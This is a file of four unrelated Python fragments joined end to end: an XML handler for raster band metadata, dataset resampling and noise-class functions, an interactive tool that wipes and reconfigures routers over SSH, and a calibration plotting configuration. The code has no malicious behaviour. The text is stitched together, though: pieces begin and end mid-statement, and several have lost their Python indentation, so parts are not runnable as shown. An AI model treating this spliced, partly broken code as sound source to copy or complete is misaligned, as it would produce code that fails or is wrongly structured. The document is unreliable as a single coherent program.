msg += "yet trying to store band information name."
raise xml.sax.SAXException(msg)
self._bandinfo_name.append(content)
elif self._get_bandinfo_var_name:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information variable name."
raise xml.sax.SAXException(msg)
self._bandinfo_var_name.append(content)
elif self._get_bandinfo_var_unit:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information variable unit."
raise xml.sax.SAXException(msg)
self._bandinfo_var_unit.append(content)
elif self._get_bandinfo_method:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information method."
raise xml.sax.SAXException(msg)
self._bandinfo_method.append(content)
elif self._get_bandinfo_comment:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information comment."
raise xml.sax.SAXException(msg)
self._bandinfo_comment.append(content)
def startElement(self, name, attrs):
if name == 'hsterms:BandInformation':
if self._get_bandinfo:
raise xml.sax.SAXException("Error: nested hsterms:BandInformation elements.")
self._get_bandinfo = True
elif name == 'rdf:Description':
if self._get_bandinfo:
if self._get_bandinfo_details:
msg = "Error: nested rdf:Description elements " \
"within hsterms:BandInformation element."
raise xml.sax.SAXException(msg)
# Create new band info
self.band_info.append(RasterResourceMeta.BandInformation())
self._get_bandinfo_details = True
elif name == 'hsterms:name':
if self._get_bandinfo_details:
if self._get_bandinfo_name:
raise xml.sax.SAXException("Error: nested hsterms:name elements "
"within hsterms:BandInformation.")
self._get_bandinfo_name = True
self._bandinfo_name = []
elif name == 'hsterms:variableName':
if self._get_bandinfo_details:
if self._get_bandinfo_var_name:
raise xml.sax.SAXException("Error: nested hsterms:variableName elements "
"within hsterms:BandInformation.")
self._get_bandinfo_var_name = True
self._bandinfo_var_name = []
elif name == 'hsterms:variableUnit':
if self._get_bandinfo_details:
if self._get_bandinfo_var_unit:
raise xml.sax.SAXException("Error: nested hsterms:variableUnit elements "
"within hsterms:BandInformation.")
self._get_bandinfo_var_unit = True
self._bandinfo_var_unit = []
elif name == 'hsterms:method':
if self._get_bandinfo_details:
if self._get_bandinfo_method:
raise xml.sax.SAXException("Error: nested hsterms:method elements "
"within hsterms:BandInformation.")
self._get_bandinfo_method = True
self._bandinfo_method = []
elif name == 'hsterms:comment':
if self._get_bandinfo_details:
if self._get_bandinfo_comment:
raise xml.sax.SAXException("Error: nested hsterms:comment elements "
"within hsterms:BandInformation.")
self._get_bandinfo_comment = True
self._bandinfo_comment = []
def endElement(self, name):
if name == 'hsterms:BandInformation':
if not self._get_bandinfo:
msg = "Error: close hsterms:BandInformation tag without corresponding open tag."
raise xml.sax.SAXException(msg)
self._get_bandinfo = False
elif name == 'rdf:Description':
if self._get_bandinfo:
if not self._get_bandinfo_details:
msg = "Error: close rdf:Description tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self._get_bandinfo_details = False
elif name == | |
import numpy as np
import random
from scipy.stats import skew as scipy_skew
from skimage.transform import resize as skimage_resize
from QFlow import config
## set of functions for loading and preparing a dataset for training.
def get_num_min_class(labels):
    '''
    Return the sample count of the least-represented class in a label array.
    Used for resampling data.

    input:
        labels: np.ndarray of (one-hot/fractional) labels; an example's class
            is taken as the argmax over the last axis.
    outputs:
        num_samples: int number of samples for the minimum class
    '''
    # use argmax as example's class
    class_ids = np.argmax(labels, axis=-1)
    per_class = [np.sum(class_ids == c) for c in range(labels.shape[-1])]
    # upper bound is the total sample count (all examples one label)
    return min([labels.shape[0]] + per_class)
def resample_data(features, state_labels, labels=None, seed=None):
    '''
    Balance the dataset across the classes of state_labels by truncating
    every class to the size of the least-represented one (an example's class
    is the argmax over the last axis of state_labels), then shuffling the
    balanced set.

    inputs:
        features: ndarray of features, resampled along the first axis.
        state_labels: ndarray of labels used to determine class membership.
        labels: optional ndarray of labels resampled alongside features.
        seed: seed of the random generator used for the per-class index
            shuffles and the final shuffle.
    outputs:
        (features, labels) when labels is given, otherwise
        (features, state_labels); each resampled and shuffled identically.
    '''
    rng = np.random.default_rng(seed)
    n_keep = get_num_min_class(state_labels)

    feat_parts = []
    state_parts = []
    label_parts = []
    for class_idx in range(state_labels.shape[-1]):
        mask = state_labels.argmax(axis=-1) == class_idx
        # full per-class arrays first
        feats_c = features[mask]
        states_c = state_labels[mask]
        if labels is not None:
            labels_c = labels[mask]
        # shuffle an index list so all arrays stay aligned, then truncate
        order = list(range(feats_c.shape[0]))
        rng.shuffle(order)
        keep = order[:n_keep]
        feat_parts.append(feats_c[keep])
        state_parts.append(states_c[keep])
        if labels is not None:
            label_parts.append(labels_c[keep])

    feats_out = np.concatenate(feat_parts, axis=0)
    states_out = np.concatenate(state_parts, axis=0)
    if labels is not None:
        labels_out = np.concatenate(label_parts, axis=0)

    # final shuffle of the balanced set
    order = list(range(feats_out.shape[0]))
    rng.shuffle(order)
    if labels is not None:
        return feats_out[order], labels_out[order]
    return feats_out[order], states_out[order]
def noise_mag_to_class(state_labels, noise_mags,
                       low_thresholds=None, high_thresholds=None):
    '''
    Function to convert noise magnitudes to noise classes.

    Noise class thresholds are defined here. Thresholds for states
    order is: no dot, left dot, central dot, right dot, double dot

    Default low thresholds is the linear extrapolation to 100 % accuracy
    of an average noisy-trained model vs. noise_mag. Default high
    thresholds are from linear extrapolation to 0 % accuracy of an
    average noisy trained model vs. noise_mag.

    inputs:
        state_labels: list of state labels. shape assumed to be
            (num_examples, num_states).
        noise_mags: list of float noise_mags for state_labels. shape assumed
            to be (num_examples, ).
        low_thresholds: list of floats of shape (num_state, ) specifying
            high signal to noise class thresholds.
        high_thresholds: list of floats of shape (num_state, ) specifying
            high signal to noise class thresholds.
    outputs:
        quality_classes: np.ndarray of fractional noise-class labels of
            shape (num_examples, num_quality_classes).
    '''
    # number of noise classes; the hard-coded class indices below assume 3
    # (no num_quality_classes != 3 are supported).
    num_quality_classes = config.NUM_QUALITY_CLASSES

    # set default thresholds (length must equal the number of states)
    if high_thresholds is None:
        high_thresholds = [1.22, 1.00, 1.21, 0.68, 2.00]
    if low_thresholds is None:
        low_thresholds = [0.31, 0.32, 0.41, 0.05, 0.47]
    low_thresholds = np.array(low_thresholds)
    high_thresholds = np.array(high_thresholds)

    # number of states comes from the labels themselves.
    # (Removed dead stores from the original: a pre-allocated
    # quality_classes array that was immediately overwritten by the einsum
    # result, and num_states = config.NUM_STATES which was immediately
    # overwritten by state_labels.shape[-1].)
    num_states = state_labels.shape[-1]

    # per-state one-hot quality classes; combined with the (fractional)
    # state labels below to produce a weighted average over states
    per_state_classes = np.zeros(
        noise_mags.shape + (num_quality_classes,) + (num_states,))
    # use boolean indexing to define classes from noise mags/threshold arrays
    for i in range(num_states):
        per_state_classes[noise_mags <= low_thresholds[i], 0, i] = 1
        per_state_classes[(noise_mags > low_thresholds[i]) &
                          (noise_mags <= high_thresholds[i]), 1, i] = 1
        per_state_classes[noise_mags > high_thresholds[i], 2, i] = 1
    # multiply each first axis element then sum across last axes
    quality_classes = np.einsum('ijk,ik->ij', per_state_classes, state_labels)

    return quality_classes
def get_data(f, train_test_split=0.9,
             dat_key='sensor', label_key='state',
             resample=True, seed=None,
             low_thresholds=None, high_thresholds=None):
    '''
    Reads in the subregion data and converts it to a format useful for training
    Note that the data is shuffled (per-file) after reading in.
    inputs:
        f: one of:
            str path to .npz file containing cropped data
            dict of cropped data.
        train_test_split: float fraction of data to use for training.
        dat_key: string key into each example dict for the input data array.
        label_key: string key for data used for the label. One of:
            'data_quality', 'noise_mag_factor', 'state'.
        resample: bool specifying whether to resample data to get even state
            representation.
        seed: int random seed for file shuffling.
        low_thresholds: list of noise levels to use for high/moderate signal
            to noise ratio threshold.
        high_thresholds: list of noise levels to use for moderate/low signal
            to noise ratio threshold.
    outputs:
        train_data: np.ndarray of training data.
        train_labels: np.ndarray of training labels.
        eval_data: np.ndarray of evaluation data.
        eval_labels: np.ndarray of evaluation labels.
    '''
    # treat f as path, or if TypeError treat as dict.
    try:
        dict_of_dicts = np.load(f, allow_pickle=True)
        file_on_disk = True
    except TypeError:
        dict_of_dicts = f
        file_on_disk = False
    files = list(dict_of_dicts.keys())
    # deterministic shuffle when a seed is given
    random.Random(seed).shuffle(files)
    inp = []
    oup_state = []
    # if we want a nonstate label load it so we can resample
    if label_key != 'state':
        oup_labels = []
    else:
        oup_labels = None
    train_labels = None
    eval_labels = None
    # if label is noise class, we need to get noise mag labels first
    # then process to turn the mag into a class label
    if label_key == 'data_quality':
        data_quality = True
        label_key = 'noise_mag_factor'
    else:
        data_quality = False
    for file in files:
        # for compressed data, file is the key of the dict of dicts
        if file_on_disk:
            data_dict = dict_of_dicts[file].item()
        else:
            data_dict = dict_of_dicts[file]
        dat = data_dict[dat_key]
        # generates a list of arrays
        inp.append(dat.reshape(config.SUB_SIZE, config.SUB_SIZE, 1))
        oup_state.append(data_dict['state'])  # generates a list of arrays
        if oup_labels is not None:
            oup_labels.append(data_dict[label_key])
    inp = np.array(inp)  # converts the list to np.array
    oup_state = np.array(oup_state)  # converts the list to np.array
    if oup_labels is not None:
        oup_labels = np.array(oup_labels)
    # split data into train and evaluation data/labels
    n_samples = inp.shape[0]
    print("Total number of samples :", n_samples)
    n_train = int(train_test_split * n_samples)
    train_data = inp[:n_train]
    print("Training data info:", train_data.shape)
    train_states = oup_state[:n_train]
    if oup_labels is not None:
        train_labels = oup_labels[:n_train]
    eval_data = inp[n_train:]
    print("Evaluation data info:", eval_data.shape)
    eval_states = oup_state[n_train:]
    if oup_labels is not None:
        eval_labels = oup_labels[n_train:]
    # convert noise mag to class before resampling/getting noise mags if
    # needed because resampling doesnt return state labels
    if data_quality:
        train_labels = noise_mag_to_class(
            train_states, train_labels,
            low_thresholds=low_thresholds,
            high_thresholds=high_thresholds,
        )
        eval_labels = noise_mag_to_class(
            eval_states, eval_labels,
            low_thresholds=low_thresholds,
            high_thresholds=high_thresholds,
        )
    # resample to make state representation even
    if resample:
        train_data, train_labels = resample_data(
            train_data, train_states, train_labels)
        eval_data, eval_labels = resample_data(
            eval_data, eval_states, eval_labels)
    elif label_key == 'state':
        # not resampling and the label is the state itself
        train_labels = train_states
        eval_labels = eval_states
    # expand dim of labels to make sure that they have proper shape.
    # BUG FIX: np.expand_dims returns a new array; the original code
    # discarded the result, so 1-D labels were never reshaped.
    if oup_labels is not None and len(train_labels.shape) == 1:
        train_labels = np.expand_dims(train_labels, 1)
    if oup_labels is not None and len(eval_labels.shape) == 1:
        eval_labels = np.expand_dims(eval_labels, 1)
    return train_data, train_labels, eval_data, eval_labels
## preprocess functions
def gradient(x):
    '''
    Return the gradient of ``x`` along the horizontal (x) direction.

    Thin wrapper around np.gradient(); note that the x direction maps to
    axis=1 and the y direction to axis=0.
    input:
        x: An numpy ndarray to take the gradient of
    output:
        numpy ndarray containing gradient in x direction.
    '''
    horizontal_axis = 1
    return np.gradient(x, axis=horizontal_axis)
def apply_threshold(x, threshold_val=10, threshold_to=0):
    '''
    Replace low-magnitude entries of ``x`` in place.

    Entries strictly below the absolute value of the ``threshold_val``-th
    percentile of ``x`` are set to ``threshold_to``. The input array is
    modified in place and also returned.
    Args:
        x = numpy array with data to be filtered
        threshold_val = percentile below which to set values to threshold_to
        threshold_to = replacement value for suppressed entries
    '''
    cutoff = np.abs(np.percentile(x.flatten(), threshold_val))
    below_cutoff = x < cutoff
    x[below_cutoff] = threshold_to
    return x
def apply_clipping(x, clip_val=3, clip_to='clip_val'):
'''
Clip input symmetrically at clip_val number of std devs.
Do not zscore norm x, but apply thresholds using normed x
'''
x_clipped = np.copy(x)
mean = np.mean(x)
std = np.std(x)
norm_x = (x - mean) / std
# set clipped values to either the mean or clip threshold
if clip_to.lower() == 'clip_val':
x_clipped[norm_x < -clip_val] = -clip_val * std + mean
x_clipped[norm_x > clip_val] = clip_val * std + mean
elif clip_to.lower() == 'mean':
x_clipped[norm_x < -clip_val] = mean
x_clipped[norm_x > clip_val] = mean
else:
| |
# stdlib
import json
import re
import traceback
from typing import Any, Dict, Optional
# libs
import netaddr
# local
from bin import RouterMixin, utils
import settings
ADDRESS_NAME_SUB_PATTERN = re.compile(r'[\.\/:]')
class RouterScrub(RouterMixin):
def run(self):
self.run_router()
def prompt(self):
print()
utils.colour_print('(colour_cmd)\u250D' + ('\u2501' * 30) + '\u2511')
utils.colour_print('\u2502' + (' ' * 30) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 12) + '(colour_warning)WARNING(colour_cmd)' + (' ' * 11) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 30) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 2) + '(colour_clear)Deploying a router deletes'
'(colour_cmd)' + (' ' * 2) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 3) + '(colour_clear)all of the configuration'
'(colour_cmd)' + (' ' * 3) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 8) + '(colour_clear)on that device'
'(colour_cmd)' + (' ' * 8) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 30) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 6) + '(colour_clear)Deploying a router'
'(colour_cmd)' + (' ' * 6) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 5) + '(colour_clear)ALREADY in production'
'(colour_cmd)' + (' ' * 4) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 2) + '(colour_clear)will cause service outages.'
'(colour_cmd)' + ' ' + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 3) + '(colour_clear)Make sure you have read'
'(colour_cmd)' + (' ' * 4) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 4) + '(colour_clear)the "help" and updated'
'(colour_cmd)' + (' ' * 4) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 3) + '(colour_clear)settings file correctly.'
'(colour_cmd)' + (' ' * 3) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 5) + '(colour_clear)Press (colour_cmd)Y or y '
'(colour_clear)to continue.(colour_cmd)' + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 5) + '(colour_clear)Press (colour_cmd)Any key '
'(colour_clear)to exit.(colour_cmd)' + (' ' * 3) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 30) + '\u2502')
utils.colour_print(
'\u2515' + ('\u2501' * 30) + '\u2519(colour_clear)')
print()
    def run_router(self):
        """
        Interactive router-scrub workflow.

        Prompts the operator for confirmation, validates the settings file
        (access lists, cloud, pod and subnet definitions), fetches the
        router model and root encrypted password over the OOB network,
        assembles the port/template data, shows a summary table and — on a
        final confirmation — calls ``RouterScrub.scrub`` with it.
        """
        try:
            self.prompt()
            # Abort unless the operator explicitly confirms with Y/y.
            if input() not in ['Y', 'y']:
                return
            utils.line_break()
            print()
            # loading settings data
            utils.colour_print('Reading the settings file...')
            # validating map_access_list
            utils.colour_print('Validating MAP_ACCESS_LIST ...')
            map_access_list = settings.MAP_ACCESS_LIST
            for firewall in map_access_list:
                self.validate_firewall(firewall)
            clouds = settings.clouds
            # NOTE(review): only the first cloud's name is sanity-checked here.
            if clouds[0]['name'] in ['', None]:
                utils.error(f'Invalid cloud name, Please edit the settings file correctly')
                return
            label = f'All available clouds in the settings file are:'
            utils.colour_print(
                '┌─────────────────────────────────────────────────┐',
            )
            utils.colour_print(f'│{label:^49}│')
            utils.colour_print(
                '├───────────┬─────────────────────────────────────┤',
            )
            utils.colour_print(
                '│    id     │                Name                 │',
            )
            utils.colour_print(
                '├───────────┼─────────────────────────────────────┤',
            )
            cloud_ids = []
            for cloud in clouds:
                cloud_ids.append(cloud['id'])
                utils.colour_print(f'│{cloud["id"]:^11}│{cloud["name"]:^37}│')
            utils.colour_print(
                '└───────────┴─────────────────────────────────────┘',
            )
            cloud_id = input(
                utils.colour('(colour_warning)Select the cloud by entering "id" of the cloud.(colour_clear): '),
            )
            # NOTE(review): input() yields str, so this membership test
            # assumes cloud ids in settings are strings — confirm.
            if cloud_id not in cloud_ids:
                utils.error('Invalid cloud id, exiting. Please try again with correct cloud id.')
                return
            the_cloud = None
            for cloud in clouds:
                if cloud['id'] == cloud_id:
                    the_cloud = cloud
            # validating the cloud settings
            utils.colour_print('Validating COP_ACCESS_LIST ...')
            cop_access_list = the_cloud['COP_ACCESS_LIST']
            for firewall in cop_access_list:
                self.validate_firewall(firewall)
            pods = the_cloud['pods']
            label = f'All available pods from the cloud #{the_cloud["name"]} are:'
            utils.colour_print(
                '┌───────────────────────────────────────────────────────────┐',
            )
            utils.colour_print(f'│{label:^59}│')
            utils.colour_print(
                '├───────────┬────────────────────────────────────┬──────────┤',
            )
            utils.colour_print(
                '│    id     │                Name                │   Type   │',
            )
            utils.colour_print(
                '├───────────┼────────────────────────────────────┼──────────┤',
            )
            pod_ids = []
            for pod in pods:
                pod_ids.append(pod['id'])
                utils.colour_print(f'│{pod["id"]:^11}│{pod["name"]:^36}│{pod["type"]:^10}│')
            utils.colour_print(
                '└───────────┴────────────────────────────────────┴──────────┘',
            )
            pod_id = input(
                utils.colour('(colour_warning)Select the pod by entering "id" of the pod.(colour_clear): '),
            )
            if pod_id not in pod_ids:
                utils.error('Invalid pod id, exiting. Please try again with correct pod id.')
                return
            the_pod = None
            for pod in pods:
                if pod['id'] == pod_id:
                    the_pod = pod
            public_port_config = []
            # validating the pod settings
            utils.colour_print('validating IPv4_link_subnet...')
            # An empty address_range means the link subnet is unused; it is
            # skipped silently rather than treated as an error.
            for subnet in the_pod['IPv4_link_subnet']:
                if subnet['address_range'] != '':
                    if not self.validate_address(subnet['address_range']):
                        utils.error(f'Invalid address_range in IPv4_link_subnet #{subnet}')
                        exit()
                    if not self.validate_address(subnet['gateway']):
                        utils.error(f'Invalid gateway in IPv4_link_subnet #{subnet}')
                        exit()
                    public_port_config.append(subnet)
            utils.colour_print('validating IPv4_pod_subnets...')
            for subnet in the_pod['IPv4_pod_subnets']:
                if not self.validate_address(subnet['address_range']):
                    utils.error(f'Invalid address_range in IPv4_pod_subnets #{subnet}')
                    exit()
                if not self.validate_address(subnet['gateway']):
                    utils.error(f'Invalid gateway in IPv4_link_subnet #{subnet}')
                    exit()
                public_port_config.append(subnet)
            utils.colour_print('validating IPv6_link_subnet...')
            for subnet in the_pod['IPv6_link_subnet']:
                if not self.validate_address(subnet['address_range']):
                    utils.error(f'Invalid address_range in IPv6_link_subnet #{subnet}')
                    exit()
                if not self.validate_address(subnet['gateway']):
                    utils.error(f'Invalid gateway in IPv6_link_subnet #{subnet}')
                    exit()
                public_port_config.append(subnet)
            mgmt_port_config = []
            utils.colour_print('validating IPv6_pod_subnets...')
            for subnet in the_pod['IPv6_pod_subnets']:
                if not self.validate_address(subnet['address_range']):
                    utils.error(f'Invalid address_range in IPv6_pod_subnets #{subnet}')
                    exit()
                # Derive the management address/gateway from the subnet
                # prefix. NOTE(review): this mutates the settings dict entry
                # in place, and assumes address_range is written so that the
                # part before '/' ends with ':' — confirm against settings.
                address = subnet['address_range'].split('/')
                subnet['address_range'] = f'{address[0]}10:0:1/64'
                subnet['gateway'] = f'{address[0]}10:0:1'
                mgmt_port_config.append(subnet)
            utils.colour_print('validating IPv4_RFC1918_subnets...')
            for subnet in the_pod['IPv4_RFC1918_subnets']:
                if not self.validate_address(subnet['address_range']):
                    utils.error(f'Invalid address_range in IPv4_RFC1918_subnets #{subnet}')
                    exit()
                if not self.validate_address(subnet['gateway']):
                    utils.error(f'Invalid gateway in IPv4_RFC1918_subnets #{subnet}')
                    exit()
                mgmt_port_config.append(subnet)
            access_addrs = map_access_list + cop_access_list
            mgmt_access_addresses = []
            for item in access_addrs:
                # an address is defined with name in router, the name can be any unique so is taken from ip address
                # itself by converting its non integers like '.' , '/', ':' to '-'.
                item['source_address_name'] = ADDRESS_NAME_SUB_PATTERN.sub('-', item['source_address'])
                item['destination_address_name'] = ADDRESS_NAME_SUB_PATTERN.sub('-', item['destination_address'])
                mgmt_access_addresses.append(item)
            # Accumulate everything the scrub template needs.
            template_data: Optional[Dict[str, Any]]
            template_data = {
                'name_servers': settings.ROUTER_NAME_SERVERS,
                'mgmt_access_addresses': mgmt_access_addresses,
                'robot_rsa': settings.ROBOT_RSA,
                'rocky_rsa': settings.ROCKY_RSA,
                'administrator_encryp_pass': settings.ADMINISTRATOR_ENCRYP_PASS,
                'api_user': settings.API_USER_PASS,
                'radius_server_address': settings.RADIUS_SERVER_ADDRESS,
                'radius_server_secret': settings.RADIUS_SERVER_SECRET,
                'location': the_pod['location'],
                'name': the_pod['name'],
            }
            utils.line_break()
            print()
            # Get the oob router
            utils.colour_print('(colour_prompt)Please enter correct OOB ip of the router to be scrubbed(colour_clear).')
            utils.colour_print('\r - e.g 10.S.R.U where S:site number; R:rack number; U:unit location')
            utils.colour_print('\r - each must be in range 0-254')
            oob_ip = self.user_input_valid_address('')
            utils.line_break()
            print()
            # SSHing into router for router model
            utils.colour_print('(colour_prompt)Fetching the router model...(colour_clear)')
            router_model = RouterScrub.router_model(oob_ip)
            if not router_model:
                utils.error(f'Failed to fetch router model for given ip #{oob_ip}, Check the oob ip and try again.')
                return
            utils.colour_print(
                f'The router model for given ip #{oob_ip} is (colour_success){router_model}(colour_clear)',
            )
            utils.line_break()
            print()
            # oob 10.S.R.U S:site; R:rack; U:unit
            template_data['router'] = {
                'router_ip': oob_ip,
                'router_location': oob_ip.replace('.', ''),  # 10SRU
                'router_model': router_model,
            }
            # sshing into router for root encrypted password
            utils.colour_print('(colour_prompt)Fetching the root encrypted password...(colour_clear)')
            root_encrypt_password = RouterScrub.root_encrypted_password(oob_ip)
            if not root_encrypt_password:
                utils.error(f'Failed to fetch root encrypted password from router.')
                return
            utils.colour_print(
                f'Found root encrypted password of router #{oob_ip}',
            )
            template_data['root_encrypted_password'] = root_encrypt_password
            utils.line_break()
            print()
            # confirm if router model is fibre or copper in case SRX345-DUAL-AC
            if router_model in ['SRX345-DUAL-AC', 'SRX345']:
                router_model = 'SRX345'
                utils.colour_print('(colour_prompt)Type of router cabling: ')
                utils.colour_print('(colour_prompt)\r - 1. Copper')
                utils.colour_print('(colour_prompt)\r - 2. Fibre')
                option = ''
                while option not in ['1', '2']:
                    option = utils.user_input_validate(
                        utils.colour('(colour_warning)Please enter "1" for Copper or "2" for Fibre.(colour_clear)'),
                    )
                if str(option) == '1':
                    router_model = f'{router_model}-Copper'
                    utils.colour_print(f'(colour_prompt)Preparing router scrub for {router_model}...(colour_clear)')
                if str(option) == '2':
                    router_model = f'{router_model}-Fibre'
                    utils.colour_print(f'(colour_prompt)Preparing router scrub for {router_model}...(colour_clear)')
            else:
                utils.colour_print(f'(colour_prompt)Preparing router scrub for {router_model}...(colour_clear)')
            utils.line_break()
            print()
            # Prepare the router's specs from json.
            try:
                with open('data/router_specs.json', 'r') as f:
                    template_data['ports'] = json.load(f)['routers'][f'{router_model}']
            except:
                # NOTE(review): bare except — also catches KeyError for an
                # unknown router model; traceback is printed before returning.
                utils.error('An error occurred while preparing router scrub')
                traceback.print_exc()
                return
            # Collect the template data.
            for port in template_data['ports']:
                # oob is already taken
                if port['function'] == 'OOB':
                    port['port_configs'].append(
                        {
                            'ip': oob_ip,
                            'mask': 16,  # /16 for oob is by design, if changes should reflect here.
                            'type': 'inet',
                            'gateway': f'10.{oob_ip.split(".")[1]}.0.1',
                        },
                    )
                # Management
                if port['function'] == 'Management':
                    for address in mgmt_port_config:
                        ip = address['address_range'].split('/')
                        port['port_configs'].append(
                            {
                                'ip': ip[0],
                                'mask': ip[1],
                                'type': 'inet6' if netaddr.IPAddress(ip[0]).version == 6 else 'inet',
                                'gateway': address['gateway'],
                            },
                        )
                # Public
                if port['function'] == 'Floating':
                    for address in public_port_config:
                        ip = address['address_range'].split('/')
                        port['port_configs'].append(
                            {
                                'ip': ip[0],
                                'mask': ip[1],
                                'type': 'inet6' if netaddr.IPAddress(ip[0]).version == 6 else 'inet',
                                'gateway': address['gateway'],
                            },
                        )
            # All data check
            label = f'Router #{router_model} {oob_ip} ports and IPs'
            utils.colour_print(
                '┌─────────────────────────────────────────────────────────────────────────────────────────┐',
            )
            utils.colour_print(f'│{label:^89}│')
            utils.colour_print(
                '├───────────┬─────────────┬───────────────────────────┬───────┬───────────────────────────┤',
            )
            utils.colour_print(
                '│   Name    │  Function   │            IPs            │ Mask  │          Gateway          │',
            )
            utils.colour_print(
                '├───────────┼─────────────┼───────────────────────────┼───────┼───────────────────────────┤',
            )
            for port in template_data['ports']:
                function = port['function']
                name = port['name']
                if function != 'Private':
                    port_configs = port['port_configs']
                    for i, ip in enumerate(port_configs):
                        # proper print: only the first row repeats name/function
                        if i == 0:
                            utils.colour_print(
                                f'│{name:^11}│{function:^13}│{ip["ip"]:^27}│{ip["mask"]:^7}│{ip["gateway"]:^27}│',
                            )
                        else:
                            utils.colour_print(
                                f'│{"":^11}│{"":^13}│{ip["ip"]:^27}│{ip["mask"]:^7}│{ip["gateway"]:^27}│',
                            )
                else:
                    utils.colour_print(
                        f'│{name:^11}│{function:^13}│{"-":^27}│{"-":^7}│{"-":^27}│',
                    )
            utils.colour_print(
                '└───────────┴─────────────┴───────────────────────────┴───────┴───────────────────────────┘')
            utils.line_break()
            yes = input(
                utils.colour('If you want to continue press Y or y, else press any key to stop.: '),
            )
            utils.line_break()
            print()
            if yes in ['Y', 'y']:
                RouterScrub.scrub(template_data)
        except:
            # NOTE(review): bare except — any failure above lands here with a
            # generic port-configuration message plus the traceback.
            utils.error('An error occurred while configuring ports on router')
            traceback.print_exc()
@staticmethod
def validate_address(address):
"""
validates the given address or address range
"""
try:
if netaddr.IPNetwork(address):
return True
except:
address = address
utils.colour_print(f'(colour_warning) {address} is not | |
# calibration/configured_suites.py
##########################################################################
#
# Configure different suites here
#
##########################################################################
# A suite is an assemblage of variables to plot in one or more sub-plots
# along with some configuration and meta-data about the variables (i.e.
# which variables to group in which sub-plots and what units/labels to use.
# Sample suite with comments:
# 'standard' : {
# 'desc': "some help text about this suite", # Notes
# 'rows': 1, # rows of subplots to create
# 'cols': 1, # columns of subplots to create NOTE: must be 1 for now!!
# 'traces': [
# {
# 'jsontag': 'GPPAll', # The variable name in json file
# 'axesnum': 0, # Which subplot axes to draw on
# 'units': 'gC/m^2', # Label for y axis?
# 'pft': '', # Empty tag indicating this is a pft variable
# # Omit for non-pft variables!
#
# 'pftpart': 'Leaf' # Leaf, Stem, or Root. Only if 'pft' key is present!
# },
# ]
# }
configured_suites = {
'Calibration': {
'desc': "Calibrated variables (variables for which we have targets values)",
'rows':8,
'cols':1,
'traces': [
{ 'jsontag': 'GPPAllIgnoringNitrogen', 'units': 'gC/m^2', 'axesnum': 0, 'pft': '', },
{ 'jsontag': 'NPPAllIgnoringNitrogen', 'units': 'gC/m^2', 'axesnum': 0, 'pft': '', },
{'jsontag': 'NPPAll', 'axesnum': 1, 'units':'gC/m^','pft': '',},
# Targets file call for "Nuptake", but that is not output in cal json files!
# Closest match might be InNitrogenUptakeAll
#{'jsontag': 'Nuptake', 'axesnum': 2, 'units':'gC/m^2','pft': '',},
#{'jsontag': 'InNitrogenUptakeAll', 'axesnum': 2, 'units': 'gN/m^2',},
{'jsontag': 'TotNitrogenUptake', 'axesnum': 2, 'units': 'gN/m^2', 'pft':'', },
{'jsontag': 'StNitrogenUptake', 'axesnum': 2, 'units': 'gN/m^2', 'pft': '', },
{'jsontag': 'LabNitrogenUptake', 'axesnum': 2, 'units': 'gN/m^2', 'pft': '', },
{'jsontag': 'VegCarbon', 'axesnum': 3, 'units': 'gC/m^2','pft': '', 'pftpart': 'Leaf'},
{'jsontag': 'VegCarbon', 'axesnum': 3, 'units': 'gC/m^2','pft': '', 'pftpart': 'Stem'},
{'jsontag': 'VegCarbon', 'axesnum': 3, 'units': 'gC/m^2','pft': '', 'pftpart': 'Root'},
{'jsontag': 'VegStructuralNitrogen', 'axesnum': 4, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Leaf'},
{'jsontag': 'VegStructuralNitrogen', 'axesnum': 4, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Stem'},
{'jsontag': 'VegStructuralNitrogen', 'axesnum': 4, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Root'},
{'jsontag': 'MossDeathC', 'axesnum': 5,},
{'jsontag': 'CarbonShallow', 'axesnum': 6,},
{'jsontag': 'CarbonDeep', 'axesnum': 6,},
{'jsontag': 'CarbonMineralSum', 'axesnum': 6,},
{'jsontag': 'OrganicNitrogenSum', 'axesnum': 7,},
{'jsontag': 'AvailableNitrogenSum', 'axesnum': 7,},
]
},
'Environment': {
'desc': "Environmental variables plot (precip, temps, light, water)",
'rows': 5,
'cols': 1,
'traces': [
{ 'jsontag': 'TShlw', 'axesnum': 0, },
{ 'jsontag': 'TDeep', 'axesnum': 0, },
{ 'jsontag': 'TMineA', 'axesnum': 0, },
{ 'jsontag': 'TMineB', 'axesnum': 0, },
{ 'jsontag': 'TMineC', 'axesnum': 0},
{ 'jsontag': 'TAir', 'axesnum': 0, },
{ 'jsontag': 'Snowfall', 'axesnum': 1, },
{ 'jsontag': 'Rainfall', 'axesnum': 1, },
{ 'jsontag': 'EET', 'axesnum': 1, },
{ 'jsontag': 'PET', 'axesnum': 1, },
{ 'jsontag': 'VPD', 'axesnum': 1, },
{ 'jsontag': 'WaterTable', 'axesnum': 2, },
{ 'jsontag': 'ActiveLayerDepth', 'axesnum': 2, },
{ 'jsontag': 'VWCShlw', 'axesnum': 3, },
{ 'jsontag': 'VWCDeep', 'axesnum': 3, },
{ 'jsontag': 'VWCMineA', 'axesnum': 3, },
{ 'jsontag': 'VWCMineB', 'axesnum': 3, },
{ 'jsontag': 'VWCMineC', 'axesnum': 3, },
{ 'jsontag': 'PARAbsorb', 'axesnum': 4, },
